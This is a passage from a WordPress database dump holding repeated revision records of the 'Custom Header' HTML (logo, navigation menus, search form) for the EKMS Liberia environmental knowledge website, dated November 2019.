&#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:26:41','2019-11-27 20:26:41','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2863,1,'2019-11-27 20:27:42','2019-11-27 20:27:42','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:27:42','2019-11-27 20:27:42','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2864,1,'2019-11-27 20:28:40','2019-11-27 20:28:40','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:28:40','2019-11-27 20:28:40','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2865,1,'2019-11-27 20:29:13','2019-11-27 20:29:13','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:29:13','2019-11-27 20:29:13','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2866,1,'2019-11-27 20:30:21','2019-11-27 20:30:21','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:30:21','2019-11-27 20:30:21','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2867,1,'2019-11-27 20:31:02','2019-11-27 20:31:02','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:31:02','2019-11-27 20:31:02','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2868,1,'2019-11-27 20:31:24','2019-11-27 20:31:24','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:31:24','2019-11-27 20:31:24','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2869,1,'2019-11-27 20:31:47','2019-11-27 20:31:47','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>	